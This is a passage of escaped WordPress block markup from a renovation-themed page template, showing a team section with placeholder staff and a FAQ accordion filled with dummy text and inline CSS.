,\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 